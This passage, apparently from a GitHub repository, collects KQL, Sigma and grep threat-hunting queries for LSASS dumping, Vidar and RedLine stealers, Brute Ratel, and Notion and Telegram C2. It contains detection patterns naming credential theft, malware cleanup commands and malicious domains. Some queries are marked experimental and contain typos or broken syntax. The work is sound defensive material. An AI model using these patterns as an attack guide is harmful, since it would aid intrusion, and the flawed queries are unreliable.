https://twitter.com/Kostastsale/status/1646256901506605063?t=FL3DWbCPHQQfAZoLTQMt1w&s=19 20 | 21 | ### Experimental at present as I wrote these on my phone on a train 😁 22 | 23 | let action1FileNames = DeviceFileEvents 24 | | where InitiatingProcessVersionInfoOriginalFileName contains "action1" or FileName contains "action1" | distinct FileName; 25 | DeviceProcessEvents 26 | | where InitiatingProcessFileName in~ (action1FileNames) or FileName in~ (action1FileNames) or InitiatingProcessParentFileName in~ (action1FileNames) 27 | 28 | let action1FileNames = DeviceFileEvents 29 | | where InitiatingProcessVersionInfoOriginalFileName contains "action1" or FileName contains "action1" | distinct FileName; 30 | DeviceProcessEvents 31 | | where InitiatingProcessFileName in~ (action1FileNames) and FileName in~ ("PowerShell.exe","cmd.exe") 32 | 33 | let action1FileNames = DeviceFileEvents 34 | | where InitiatingProcessVersionInfoOriginalFileName contains "action1" or FileName contains "action1" | distinct FileName; 35 | DeviceNetworkEvents 36 | | where InitiatingProcessFileName in~ (action1FileNames) and ActionType in~ ("ConnectionSuccess 37 | 38 | -------------------------------------------------------------------------------- /Rundll32_executing_DLL_from_Temp.md: -------------------------------------------------------------------------------- 1 | # Source: https://redcanary.com/blog/intelligence-insights-january-2023/ 2 | 3 | # Rundll32 executing DLL files located in the Windows Temp directory 4 | The following pseudo-detection analytic identifies instances of the Windows Rundll32 process loading code from DLL files located in the Windows Temp directory. It’s possible that some enterprise software in your environment will execute DLLs from windows\temp, so additional investigation may be needed to determine if the behavior is malicious. 5 | 6 | `//Rundll32 executing DLL files located in the Windows Temp directory 7 | //The following detection analytic identifies instances of the Windows Rundll32 process loading code from DLL files located in the Windows Temp directory. It’s possible that some enterprise software in your environment will execute DLLs from windows\temp, so additional investigation may be needed to determine if the behavior is malicious. 8 | let trustedDlls = datatable(dll:string)["trustedDll.dll"]; //place trusted DLLs that launch from temp folders here. 9 | DeviceProcessEvents 10 | | where (InitiatingProcessFileName =~ "rundll32.exe" and ProcessCommandLine contains @"windows\temp") and not(ProcessCommandLine has_any (trustedDlls))` 11 | 12 | or 13 | 14 | `//Rundll32 executing DLL files located in the Windows Temp directory 15 | //The following detection analytic identifies instances of the Windows Rundll32 process loading code from DLL files located in the Windows Temp directory. It’s possible that some enterprise software in your environment will execute DLLs from windows\temp, so additional investigation may be needed to determine if the behavior is malicious. 16 | let trustedDlls = datatable(dll:string)["trustedDll.dll"]; //place trusted DLLs that launch from temp folders here. 17 | DeviceProcessEvents 18 | | where ((InitiatingProcessFileName =~ "rundll32.exe" and ProcessCommandLine contains @"windows\temp") or (InitiatingProcessParentFileName =~ "rundll32.exe" and InitiatingProcessCommandLine contains @"windows\temp")) and not(InitiatingProcessCommandLine has_any (trustedDlls) or ProcessCommandLine has_any (trustedDlls))` 19 | -------------------------------------------------------------------------------- /Scheduled_Task_Kusto_Queries.md: -------------------------------------------------------------------------------- 1 | ## Windows 10 2 | 3 | `//scheduled tasks 4 | DeviceProcessEvents 5 | | where ProcessCommandLine has_all ("svchost.exe","-k","netsvcs","-p","-s","Schedule") or InitiatingProcessCommandLine has_all ("svchost.exe","-k","netsvcs","-p","-s","Schedule") 6 | | summarize count() by InitiatingProcessCommandLine, ProcessCommandLine` 7 | 8 | `//scheduled tasks 9 | DeviceProcessEvents 10 | | where ProcessCommandLine has_all ("svchost.exe","-k","netsvcs","-p","-s","Schedule") or InitiatingProcessCommandLine has_all ("svchost.exe","-k","netsvcs","-p","-s","Schedule") 11 | | where ProcessCommandLine !endswith "AppData\\Local\\Microsoft\\OneDrive\\OneDriveStandaloneUpdater.exe" and ProcessCommandLine !~ '"MicrosoftEdgeUpdate.exe" /ua /installsource scheduler' and ProcessCommandLine !endswith "gpupdate.exe /target:computer" and ProcessCommandLine !endswith "gpupdate.exe /target:user" 12 | | summarize count() by InitiatingProcessCommandLine, ProcessCommandLine 13 | | where count_ <= 100` 14 | 15 | `//scheduled tasks 16 | DeviceProcessEvents 17 | | where (ProcessCommandLine has_all ("svchost.exe","-k","netsvcs","-p","-s","Schedule") and InitiatingProcessCommandLine contains "%TEMP%") or (InitiatingProcessCommandLine has_all ("svchost.exe","-k","netsvcs","-p","-s","Schedule") and ProcessCommandLine contains "%TEMP%")) 18 | | summarize count() by InitiatingProcessCommandLine, ProcessCommandLine` 19 | 20 | ## Windows 7 21 | 22 | `//scheduled tasks 23 | DeviceProcessEvents 24 | | where ProcessCommandLine has_all ("taskeng.exe","{") or InitiatingProcessCommandLine has_all ("taskeng.exe","{") 25 | | summarize count() by InitiatingProcessCommandLine, ProcessCommandLine` 26 | 27 | ## Windows XP 28 | 29 | Wmic process where processid-1234 get parentprocessid 30 | 31 | `//scheduled tasks 32 | DeviceProcessEvents 33 | | where ProcessCommandLine has_all ("svchost.exe","-k","netsvcs","-p","-s","Schedule") or InitiatingProcessCommandLine has_all ("svchost.exe","-k","netsvcs","-p","-s","Schedule") 34 | | summarize count() by FileName` 35 | 36 | `//scheduled tasks 37 | DeviceProcessEvents 38 | | where ProcessCommandLine has_all ("svchost.exe","-k","netsvcs","-p","-s","Schedule") or InitiatingProcessCommandLine has_all ("svchost.exe","-k","netsvcs","-p","-s","Schedule") 39 | | summarize count() by FolderPath` 40 | 41 | ## Scheduled tasks associated with certain filetypes associated with badness 42 | `//scheduled tasks associated with certain filetypes associated with badness 43 | DeviceProcessEvents 44 | | where ProcessCommandLine has_all ("svchost.exe","-k","netsvcs","-p","-s","Schedule") or InitiatingProcessCommandLine has_all ("svchost.exe","-k","netsvcs","-p","-s","Schedule") 45 | | where FileName contains "powershell" or FileName contains "cmd" or FileName contains "rundll32" or FileName contains "regsvr32" or FileName contains "wmic" 46 | | summarize count() by ProcessCommandLine` 47 | 48 | `DeviceProcessEvents 49 | | where FileName contains "powershell" or FileName contains "cmd" or FileName contains "rundll32" or FileName contains "regsvr32" or FileName contains "wmic" 50 | | summarize count() by ProcessCommandLine` 51 | 52 | `DeviceProcessEvents 53 | | where FileName contains ".ps1" or FileName contains ".bat" or FileName contains ".vbs" or FileName contains ".cmd" or FileName contains ".hta" or FileName contains ".js" 54 | | summarize count() by ProcessCommandLine` 55 | 56 | `//scheduled tasks created by wscript or cscript and is not a common script extension (scrip interpreter but using a script file) 57 | DeviceProcessEvents 58 | | where ProcessCommandLine has_all ("svchost.exe","-k","netsvcs","-p","-s","Schedule") or InitiatingProcessCommandLine has_all ("svchost.exe","-k","netsvcs","-p","-s","Schedule") 59 | | where FileName has_any ("wscript.exe","cscript.exe") and not (ProcessCommandLine has_any (".vbs",".js")) 60 | | summarize count() by ProcessCommandLine` 61 | 62 | ToDo: Identify common files in system32 that are being run from non system32 locations 63 | 64 | ## Remote scheduled tasks 65 | 66 | `DeviceImageLoadEvents 67 | | where FileName =~ "mswsock.dll" and InitiatingProcessFileName has_any ("schtasks.exe","mmc.exe","at.exe") 68 | //| project FileName, InitiatingProcessFileName, InitiatingProcessParentFileName` 69 | -------------------------------------------------------------------------------- /ShareFinder_Kusto_Query.md: -------------------------------------------------------------------------------- 1 | # Source: Detailed Report https://thedfirreport.com/2023/01/23/sharefinder-how-threat-actors-discover-file-shares/ 2 | 3 | # SIGMAs: 4 | - https://github.com/The-DFIR-Report/Sigma-Rules/blob/main/rules/windows/builtin/win_security_invoke_sharefinder_discovery.yml 5 | - https://github.com/The-DFIR-Report/Sigma-Rules/blob/main/rules/windows/powershell/powershell_script/posh_ps_invoke_sharefinder_discovery.yml 6 | - https://github.com/The-DFIR-Report/Sigma-Rules/blob/main/rules/network/zeek/zeek_smb_mapping_invoke-sharefinder_discovery.yml 7 | 8 | # Encoded data. Adversaries may encode data to make the content of command and control traffic more difficult to detect. 9 | `//T1132 - T1132.001 - Base64 Encoded data. Adversaries may encode data to make the content of command and control traffic more difficult to detect. 10 | DeviceProcessEvents 11 | | where FileName =~ "powershell.exe" 12 | //filter out FPs caused by the MDE SenseIR binary 13 | | where InitiatingProcessParentFileName != "SenseIR.exe" 14 | //filter out FPs caused by Nutanix 15 | | where InitiatingProcessFolderPath !contains "c:\\program files\\nutanix" 16 | //filter out noise caused by Windows Defender Exploit Guard 17 | | where InitiatingProcessCommandLine !startswith "gc_worker.exe -a WindowsDefenderExploitGuard" 18 | //filter out noise caused by ansible service account 19 | | where InitiatingProcessAccountName != "svc-ansiblew" 20 | | extend SplitLaunchString = split(ProcessCommandLine, " ") 21 | | mvexpand SplitLaunchString 22 | | where SplitLaunchString matches regex "^[A-Za-z0-9+/]{50,}[=]{0,2}$" 23 | | extend Base64 = tostring(SplitLaunchString) 24 | | extend DecodedString = base64_decodestring(Base64) 25 | | where isnotempty(DecodedString) 26 | | extend test = replace(@'\00', @'', DecodedString) 27 | | extend DShash = hash_md5(DecodedString) 28 | | where DShash != "765213794bd23a89ce9a84459a0cef80" 29 | | where InitiatingProcessCommandLine contains "Invoke-ShareFinder" or DecodedString contains "Invoke-ShareFinder"` 30 | -------------------------------------------------------------------------------- /T1003.001_LASS_dumping_werfault_exe.md: -------------------------------------------------------------------------------- 1 | # Memory dumping with Werfault.exe 2 | ## Credential Access 3 | ## T1003.001 4 | 5 | ### MDE 6 | 7 | `DeviceFileEvents 8 | | where InitiatingProcessParentFileName has "werfault.exe" or InitiatingProcessFileName has "werfault.exe" 9 | | where FolderPath contains "lsass" 10 | | project Timestamp, DeviceName, ActionType, FolderPath, FileName, PreviousFolderPath, PreviousFileName, FileSize, SHA256, InitiatingProcessFolderPath, InitiatingProcessFileName, InitiatingProcessCommandLine, InitiatingProcessId, InitiatingProcessSHA256, InitiatingProcessParentFileName, InitiatingProcessParentId, InitiatingProcessAccountDomain, InitiatingProcessAccountName, InitiatingProcessVersionInfoCompanyName, InitiatingProcessVersionInfoProductName, InitiatingProcessVersionInfoProductVersion, InitiatingProcessVersionInfoInternalFileName, InitiatingProcessVersionInfoOriginalFileName, InitiatingProcessVersionInfoFileDescription, DeviceId, ReportId 11 | | order by Timestamp` 12 | 13 | ### Sentinel 14 | 15 | `SecurityEvent 16 | | where NewProcessName endswith "werfault.exe" 17 | | where ObjectName endswith "lsass.exe" 18 | | project NewProcessName, ObjectName` 19 | -------------------------------------------------------------------------------- /T1087.001_AccountDiscovery-LocalAccount.md: -------------------------------------------------------------------------------- 1 | # T1087.001: Account Discovery - Local Account 2 | 3 | # Sources: 4 | 5 | 6 | ## Execution of mmc.exe, the Microsoft Management Console, spawning the lusrmgr.msc (Local Users and Groups snap-in) which displays local account information. 7 | 8 | 9 | ``` 10 | DeviceProcessEvents 11 | | where initiatingProcessFileName =~"mmc.exe" and FileName =~ "lusrmgr.msc" 12 | //Telemetry showed execution of mmc.exe, the Microsoft Management Console, spawning the lusrmgr.msc (Local Users and Groups snap-in) which displays local account information. 13 | ``` 14 | -------------------------------------------------------------------------------- /Telegram_Shortened_Domains.md: -------------------------------------------------------------------------------- 1 | # Queries from the blog: https://redcanary.com/blog/intelligence-insights-november-2022/ 2 | 3 | # Processes making outbound network connections to Telegram shortened domains t[.]me or tttttt[.]me 4 | `//Detection opportunity: Unexpected processes making outbound network connections to Telegram shortened domains t[.]me or tttttt[.]me 5 | //The following detection analytic identifies unexpected processes making outbound network connections to the Telegram shortened domains t[.]me or tttttt[.]me. Telegram has been used for command and control (C2) by various stealers including RedLine, Vidar, and Raccoon. Since legitimate applications like Windows browsers, Zscaler, and others have been observed using t[.]me, additional investigation of the executing binary’s reputation is key. 6 | //source: https://redcanary.com/blog/intelligence-insights-november-2022/ 7 | let exclusions = datatable(filename:string)["broswer1.exe","browser2.exe","telegram.exe"]; 8 | DeviceNetworkEvents 9 | | where not(InitiatingProcessFileName has_any (exclusions)) and (RemoteUrl endswith "t.me" or RemoteUrl endswith "tttttt.me")` 10 | -------------------------------------------------------------------------------- /USB_Device_Hunting.md: -------------------------------------------------------------------------------- 1 | # USB Related Hunting Queries 2 | 3 | # Sources: 4 | - https://blog.amestofortytwo.com/hunting-malicious-usb/ 5 | - 6 | - 7 | 8 | Kusto Queries (KQL): 9 | 10 | `//source: https://blog.amestofortytwo.com/hunting-malicious-usb/ 11 | // A great tool to add to this query: https://devicehunt.com/view/type/usb/ 12 | let known_suspicious = dynamic(["VID_03eb", "PID_2401" // Atmel 13 | , "VID_16D0", "PID_0753" // Digispark 14 | , "VID_16C0", "PID_0483" // Teensyduino 15 | , "VID_2341" // Arduino https://devicehunt.com/view/type/usb/vendor/2341 16 | ]); 17 | DeviceEvents 18 | | mv-expand AdditionalFields 19 | | where AdditionalFields["VendorIds"] has_any (known_suspicious) 20 | | join kind=inner ( 21 | DeviceProcessEvents 22 | | where ProcessCommandLine != "" 23 | | extend CommandRun = TimeGenerated 24 | ) on DeviceId, DeviceName 25 | | where CommandRun between (TimeGenerated .. 10s) // Time from plugin to action 26 | | where InitiatingProcessParentFileName1 has_any ("userinit.exe", "explorer.exe") // User initiated - non system actions 27 | | project Plugin=TimeGenerated, CommandRun, AdditionalFields, DeviceName, PossibleFileExec=FileName1, InitPCMD = InitiatingProcessCommandLine1, InitPPFN = InitiatingProcessParentFileName1, InitPPID=InitiatingProcessParentId1, PID=ProcessId1` 28 | -------------------------------------------------------------------------------- /VBScript_stored_in_non-run_reg_key.md: -------------------------------------------------------------------------------- 1 | # VBScript stored in non-run CurrentVersion registry key 2 | # Source: Cyborg www.cyborgsecurity.io 3 | ## Logic tweaked and improved by GK from original 4 | 5 | `DeviceRegistryEvents 6 | | where RegistryKey has "\\CurrentVersion" 7 | | where RegistryKey !has "\\Run" 8 | | where RegistryValueData has_any ("RunHTMLApplication","vbscript","jscript","mshtml","mshtml","mshtml ","Execute","CreateObject","RegRead","window.close") 9 | | project Timestamp, DeviceName, InitiatingProcessAccountName, ActionType, RegistryKey, RegistryValueName, RegistryValueData, PreviousRegistryValueName, InitiatingProcessParentFileName, InitiatingProcessFileName, InitiatingProcessId, InitiatingProcessParentId, DeviceId, ReportId 10 | | order by Timestamp` 11 | 12 | `SecurityEvent 13 | | where ObjectName has "\\CurrentVersion" 14 | | where ObjectName !has "\\Run" 15 | | where NewValue has_any ("RunHTMLApplication","vbscript","jscript","mshtml","mshtml","mshtml ","Execute","CreateObject","RegRead","window.close") 16 | | project TimeGenerated, Computer, Process, ObjectName, ObjectValueName, NewValue, OldValue, SubjectUserName, NewProcessId, SourceComputerId 17 | | order by TimeGenerated` 18 | -------------------------------------------------------------------------------- /Vidar_Kusto_Query.md: -------------------------------------------------------------------------------- 1 | # Vidar Kusto Queries 2 | 3 | `// Vidar deployed via fake zoom sites and application. Identify email or phishing containing URLs with known bad domains 4 | //https://blog.cyble.com/2022/09/19/new-malware-campaign-targets-zoom-users/ 5 | let domains = datatable (domain:string )['zoom-download.host','zoom-download.space','zoom-download.fun','zoomus.host','zoomus.tech','zoomus.website']; 6 | let dowloadUrls = datatable (url:string)[ "https://github[.]com/sgrfbnfhgrhthr/csdvmghfmgfd/raw/main/Zoom.zip"]; 7 | let files = datatable (file:string)["zoom.zip"]; 8 | EmailEvents 9 | | join EmailUrlInfo on NetworkMessageId 10 | | where UrlDomain in~ (domains)` 11 | 12 | `// Vidar deployed via fake zoom sites and application 13 | // detect network events where known bad domains and file names downloaded. 14 | //https://blog.cyble.com/2022/09/19/new-malware-campaign-targets-zoom-users/ 15 | let domains = datatable (domain:string )['zoom-download.host','zoom-download.space','zoom-download.fun','zoomus.host','zoomus.tech','zoomus.website']; 16 | let dowloadUrls = datatable (url:string)[ "https://github[.]com/sgrfbnfhgrhthr/csdvmghfmgfd/raw/main/Zoom.zip"]; 17 | let files = datatable (file:string)["zoom.zip"]; 18 | DeviceNetworkEvents 19 | | where RemoteUrl has_any (domains) and RemoteUrl has_any (files)` 20 | 21 | `// Vidar deployed via fake zoom sites and application 22 | // detect known bad process parent, child relationships 23 | //https://blog.cyble.com/2022/09/19/new-malware-campaign-targets-zoom-users/ 24 | DeviceProcessEvents 25 | | where (InitiatingProcessParentFileName contains "zoom.exe" or InitiatingProcessFileName contains "zoom.exe") and (InitiatingProcessFileName has_any ("msbuild.exe","decoder.exe") or FileName has_any ("msbuild.exe","decoder.exe","shell.exe")) 26 | | summarize count() by InitiatingProcessParentFileName, InitiatingProcessFileName, FileName` 27 | 28 | `//locate users that had interacted with the subdomain in the Vidar stealer log dump 29 | DeviceNetworkEvents 30 | | where RemoteUrl contains "stage.gk.heathrow.com" 31 | | summarize count() by InitiatingProcessAccountName, InitiatingProcessAccountUpn` 32 | 33 | `//detects commandline associated with Vidar Cleanup 34 | //Upon successful execution, the malware uses the following commands to uninstall itself from the victim’s device. 35 | //https://blog.cyble.com/2022/09/19/new-malware-campaign-targets-zoom-users/ 36 | DeviceProcessEvents 37 | | where ProcessCommandLine has_all ('C:\\Windows\\System32\\cmd.exe',' /c ','taskkill',' /im ','MSBuild.exe',' /f ',' & ',' timeout ',' /t ',' 6 ',' & ',' del ',' /f ',' /q ')` 38 | 39 | `//detects commandline associated with Vidar Cleanup 40 | //Upon successful execution, the malware uses the following commands to uninstall itself from the victim’s device.//https://blog.cyble.com/2022/09/19/new-malware-campaign-targets-zoom-users/ 41 | DeviceProcessEvents 42 | | where ProcessCommandLine has_all ('C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\MSBuild.exe','&','del','C:\\PrograData\\','.dll','&','exit')![image](https://user-images.githubusercontent.com/16122365/222918509-c06869d0-16e8-4053-9e71-1df7cd8e3381.png)` 43 | -------------------------------------------------------------------------------- /_template.md: -------------------------------------------------------------------------------- 1 | # *Detection Title* 2 | 3 | ## Query Information 4 | 5 | #### MITRE ATT&CK Technique(s) 6 | 7 | | Technique ID | Title | Link | 8 | | --- | --- | --- | 9 | | T1134.002 | Access Token Manipulation: Create Process with Token |Access Token Manipulation: Create Process with Token| 10 | 11 | #### Description 12 | Description of the detection rule. 13 | 14 | Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat. Duis aute irure dolor in reprehenderit in voluptate velit esse cillum dolore eu fugiat nulla pariatur. Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit anim id est laborum. 15 | 16 | #### Risk 17 | Explain what risk this detection tries to cover 18 | 19 | #### Author 20 | - **Name:** 21 | - **Github:** 22 | - **Twitter:** 23 | - **LinkedIn:** 24 | - **Website:** 25 | 26 | #### References 27 | - https://kqlquery.com/ 28 | - https://github.com/Bert-JanP/Hunting-Queries-Detection-Rules 29 | - example link 3 30 | 31 | ## Defender For Endpoint 32 | ```KQL 33 | // Paste your query here 34 | DeviceProcessEvents 35 | | where FileName == "Example.File" 36 | ``` 37 | ## Sentinel 38 | ```KQL 39 | // Paste your query here 40 | DeviceProcessEvents 41 | | where FileName == "Example.File" 42 | ``` 43 | -------------------------------------------------------------------------------- /admin_share_kusto_query.md: -------------------------------------------------------------------------------- 1 | 2 | 3 | DeviceProcessEvents 4 | | where (IniatingProcessParentFileName =~ "wmiprvse.exe" or IniatingProcessFileName =~ "wmiprvse.exe") and (IniatingProcessFileName =~ "cmd.exe" or FileName =~ "cmd.exe") and (InitiatingProcessCommandLine contains @"\\127.0.0.1\ADMIN" or ProcessCommandLine contains @"\\127.0.0.1\ADMIN") 5 | -------------------------------------------------------------------------------- /attackReport.md: -------------------------------------------------------------------------------- 1 | # MITRE ATT&CK Reporting 2 | 3 | let enterpriseAttack = externaldata (type:string, id:string, objects:dynamic)[h@"https://raw.githubusercontent.com/mitre/cti/master/enterprise-attack/enterprise-attack.json"] 4 | with (format="multijson"); 5 | enterpriseAttack 6 | | mv-expand objects 7 | | extend objectType = tostring(objects.type) 8 | | extend objectId = tostring(objects.id) 9 | | where objectType =~ "attack-pattern" //and attackTechnique matches regex @"T[0-9]{4}(|\.[0-9]{3})" 10 | | extend attackTechnique = parse_json(tostring(objects.external_references))[0].external_id 11 | | extend attackTechniqueName = tostring(objects.name) 12 | | extend attackUrl = parse_json(tostring(objects.external_references))[0].url 13 | | extend killchainPhases = parse_json(objects.kill_chain_phases) 14 | | extend dataSources = parse_json(objects.x_mitre_data_sources) 15 | | extend detectionAdvice = parse_json(objects.x_mitre_detection) 16 | | project attackTechnique, attackTechniqueName, attackUrl, killchainPhases, dataSources, detectionAdvice, objectId, objectType, type, objects 17 | -------------------------------------------------------------------------------- /autostart_persistence_kusto_query.md: -------------------------------------------------------------------------------- 1 | # Autostart Persistence 2 | 3 | # Master Source: https://www.hexacorn.com/blog/2017/01/28/beyond-good-ol-run-key-all-parts/ 4 | 5 | ## HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\PeerDist\Extension\PeerdistDllName=peerdist.dll 6 | The wininet.dll library is using this location internally in its P2P_PEER_DIST_API::LoadPeerDist function. 7 | 8 | ## Source: https://www.hexacorn.com/blog/2022/01/23/beyond-good-ol-run-key-part-138/ 9 |
10 | Kusto inspiration from [@Bert-JanP](https://github.com/Bert-JanP/Hunting-Queries-Detection-Rules/edit/main/DFIR/DFE%20-%20Registry-Run-Keys-Forensics.md) 11 | 12 | ### Defender For Endpoint 13 | 14 | ``` 15 | let CompromisedDevices = dynamic (["laptop1", "server1"]); 16 | let SearchWindow = 7d; //Customizable h = hours, d = days 17 | DeviceRegistryEvents 18 | | where Timestamp > ago(SearchWindow) 19 | | where DeviceName has_any (CompromisedDevices) 20 | | where PreviousRegistryKey startswith "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\PeerDist\Extension\PeerdistDllName=peerdist.dll" 21 | | extend RegistryChangeInfo = pack_dictionary("RegistryKey", RegistryKey, "Action Performed", ActionType, "Old Value", PreviousRegistryKey, "New Value", RegistryValueData) 22 | | summarize TotalKeysChanged = count(), RegistryInfo = make_set(RegistryChangeInfo) by DeviceName 23 | ``` 24 | ### Sentinel 25 | 26 | ``` 27 | let CompromisedDevices = dynamic (["laptop1", "server1"]); 28 | let SearchWindow = 7d; //Customizable h = hours, d = days 29 | DeviceRegistryEvents 30 | | where TimeGenerated > ago(SearchWindow) 31 | | where DeviceName has_any (CompromisedDevices) 32 | | where PreviousRegistryKey startswith "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\PeerDist\Extension\PeerdistDllName=peerdist.dll" 33 | | extend RegistryChangeInfo = pack_dictionary("RegistryKey", RegistryKey, "Action Performed", ActionType, "Old Value", PreviousRegistryKey, "New Value", RegistryValueData) 34 | | summarize TotalKeysChanged = count(), RegistryInfo = make_set(RegistryChangeInfo) by DeviceName 35 | ``` 36 | 37 | 38 | 39 | Persistence registry keys: 40 | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\explorer\AutoplayHandlers\Handlers 41 | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\StillImage\Registered Applications 42 | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\StillImage\Events\STIProxyEvent 43 | -------------------------------------------------------------------------------- /aws_ec2_kusto_queries.md: -------------------------------------------------------------------------------- 1 | # AWS Hunt Queries 2 | 3 | ## EC2 Security Group Backdoor 4 | 5 | **SIGMA** 6 | 7 | `title: 'Detects Backdooring EC2 Security Groups' 8 | description: 'Detects the insertion of backdoor access into EC2' 9 | author: 'Gavin Knapp' 10 | status: experimental 11 | logsource: 12 | service: cloudtrail 13 | detection: 14 | event_source: 15 | - eventName: AuthorizeSecurityGroupIngress 16 | - eventSource: ec2.amazonaws.com 17 | Filter_Trusted_Ips: 18 | sourceIPAddress: 19 | - 1.1.1.2 20 | - 8.8.8.8 21 | condition: "all of event_source and not Filter_Trusted_Ips" 22 | fields: 23 | - 'sourceIPAddress' 24 | - 'requestParameters.cidrIp' 25 | - 'userIdentity.arn' 26 | falsepositives: 27 | - 'Valid changes to security groups' 28 | level: 'high'` 29 | 30 | # Sentinel 31 | 32 | `AWSCloudTrail 33 | | where ((eventName =~ @'AuthorizeSecurityGroupIngress' and eventSource =~ @'ec2.amazonaws.com') and not (sourceIPAddress in~ (@'107.14.3.11', @'107.14.3.10', @'107.14.3.12')))` 34 | -------------------------------------------------------------------------------- /brute_ratel_C4.md: -------------------------------------------------------------------------------- 1 | # Brute Ratel Sentinel Queries 2 | 3 | ## Kusto Queries 4 | 5 | `// Possible Brute Ratel C4 Red Team Tool Detect (via DeviceFileEvents) 6 | DeviceFileEvents 7 | | where ActionType =~ "FileCreated" 8 | | where FileName has_any ('fotos.iso','version.dll','brute-dll-agent.bin','versions.dll') or PreviousFileName has_any ('fotos.iso','version.dll','brute-dll-agent.bin','versions.dll') ` 9 | 10 | `// Possible Brute Ratel C4 Red Team Tool Detect (via file_event) 11 | SecurityEvent | where EventID == 11 | where (TargetFileName contains 'fotos.iso' or TargetFileName contains 'version.dll' or TargetFileName contains 'brute-dll-agent.bin' or TargetFileName contains 'versions.dll')` 12 | 13 | //sentinel query for pipe BRC4 14 | `SecurityEvent | where (PipeName endswith @'\wewe')` 15 | 16 | ## Grep 17 | 18 | `grep -P '^(?:.*.*fotos\.iso.*|.*.*version\.dll.*|.*.*brute-dll-agent\.bin.*|.*.*versions\.dll.*)'` 19 | 20 | `grep -P '^(?:.*.*\wewe)'` 21 | -------------------------------------------------------------------------------- /chrome_browser_unusual_child_process.md: -------------------------------------------------------------------------------- 1 | Chrome Unusual Child Process 2 | 3 | `//Spawning CMD exclude extension related activity 4 | let exclusions = datatable (filename:string)["software_reporter_tool.exe"]; 5 | DeviceProcessEvents 6 | | where InitiatingProcessFileName endswith "chrome.exe" 7 | | where FileName !in~ (exclusions) 8 | | where FileName =~ "cmd.exe" and not (ProcessCommandLine has_any ("Microsoft.SharePoint.NativeMessagingClient.exe","C:\\Program Files\\Windows Security\\BrowserCore\\BrowserCore.exe","C:\\Windows\\BrowserCore\\BrowserCore.exe","chrome-extension://mjhbkkaddmmnkghdnnmkjcgpphnopnfk/","chrome-extension://efaidnbmnnnibpcajpcglclefindmkaj/","chrome-extension://akfldeakecjegioiiajhpjpekomdjnmh/")) 9 | | summarize count() by ProcessCommandLine` 10 | 11 | `let exclusions = datatable (filename:string)["software_reporter_tool.exe"]; 12 | DeviceProcessEvents 13 | | where InitiatingProcessFileName endswith "chrome.exe" 14 | | where FileName !in~ (exclusions) 15 | | where not (ProcessCommandLine has_any ("chrome-extension://","Microsoft.SharePoint.NativeMessagingClient.exe","C:\\Program Files\\Windows Security\\BrowserCore\\BrowserCore.exe","C:\\Windows\\BrowserCore\\BrowserCore.exe")) 16 | | summarize count() by InitiatingProcessFileName, FileName, FolderPath 17 | | sort by count_ asc` 18 | -------------------------------------------------------------------------------- /command_and_control_NotionC2.md: -------------------------------------------------------------------------------- 1 | 2 | # Title: Notion C2 3 | 4 | # Source: 5 | 6 | - https://github.com/mttaggart/OffensiveNotion 7 | 8 | # Tactic: Command and Control 9 | 10 | # Technique: 11 | 12 | # MDE and Sentinel Kusto Query 13 | 14 | ``` 15 | let excludedProcesses = datatable(name:string)["browser1.exe","browser2.exe"]; //examples but check your environment first to remove false positives and use the filename and file path to reduce risk of false negative or evasion from the bad guys 16 | DeviceNetworkEvents 17 | | where RemoteUrl has "api.notion.com" and not (InitiatingProcessFileName has_any (excludedProcesses)) and InitiatingProcessVersionInfoCompanyName != "Notion Labs, Inc" 18 | ``` 19 | 20 | # Sentinel query to identify commandlines associated with suspicious processes communicating with googleapis.com endpoints 21 | ``` 22 | let excludedProcessFileNames = datatable (browser:string)["teams.exe","GoogleUpdate.exe","outlook.exe","msedge.exe","chrome.exe","iexplorer.exe","brave.exe","firefox.exe", "swi_fc.exe"]; //add more browsers or mail clients where needed for exclusion  23 |     DeviceNetworkEvents 24 |     | where RemoteUrl contains "notion.com" 25 |     | where not(InitiatingProcessFileName has_any (excludedProcessFileNames)) and InitiatingProcessVersionInfoCompanyName != "Notion Labs, Inc" 26 |     | extend joinkey = strcat(InitiatingProcessFileName, DeviceName, InitiatingProcessAccountName) 27 |     | join kind=leftouter (DeviceProcessEvents | extend  joinkey = strcat(InitiatingProcessParentFileName, DeviceName, InitiatingProcessAccountName) | summarize ProcessesRanByParent = make_set(InitiatingProcessCommandLine) by joinkey) on joinkey 28 |     | join kind=leftouter (DeviceFileEvents | where ActionType == "FileCreated" | extend  joinkey = strcat(InitiatingProcessParentFileName, DeviceName, InitiatingProcessAccountName) | summarize FilesCreated = make_set(FileName) by joinkey) on joinkey 29 |     | project TimeGenerated,  DeviceName, InitiatingProcessAccountName, InitiatingProcessCommandLine, InitiatingProcessFolderPath, FilesCreated, ProcessesRanByParent, LocalIP, RemoteIP, RemoteUrl 30 | ``` 31 | -------------------------------------------------------------------------------- /commandandcontrol_stealer_redline_pastebin.md: -------------------------------------------------------------------------------- 1 | # Redline stealer using pastebin 2 | 3 | Redline Stealer reported to be using pastebin to grab C2 configuration. 4 | 5 | # Source: 6 | 7 | https://twitter.com/NexusFuzzy/status/1654056343127425026?s=19 8 | 9 | # Hunt queries 10 | 11 | ``` 12 | let excludedPaths = datatable(path:string)["browserpath1","browserpath2","etc..."]; 13 | DeviceNetworkEvents 14 | | where RemoteUrl contains "pastebin.com" and InitiatingProcessFolderPath !has_any (excludedPaths) 15 | ``` 16 | 17 | 18 | 19 | -------------------------------------------------------------------------------- /external_data_botnets_tracker_abuse_ch.kusto: -------------------------------------------------------------------------------- 1 | ## https://feodotracker.abuse.ch/ 2 | let abuse_ch_botnets = externaldata(first_seen:datetime,last_online:datetime,ip_address:string, port:int, status:string, hostname:string,as_number:int,as_name:string,country:string,malware:string) 3 | [ 4 | h@"https://feodotracker.abuse.ch/downloads/ipblocklist_recommended.json" 5 | ] 6 | with(format="multijson",ignoreFirstRecord=true); 7 | abuse_ch_botnets 8 | -------------------------------------------------------------------------------- 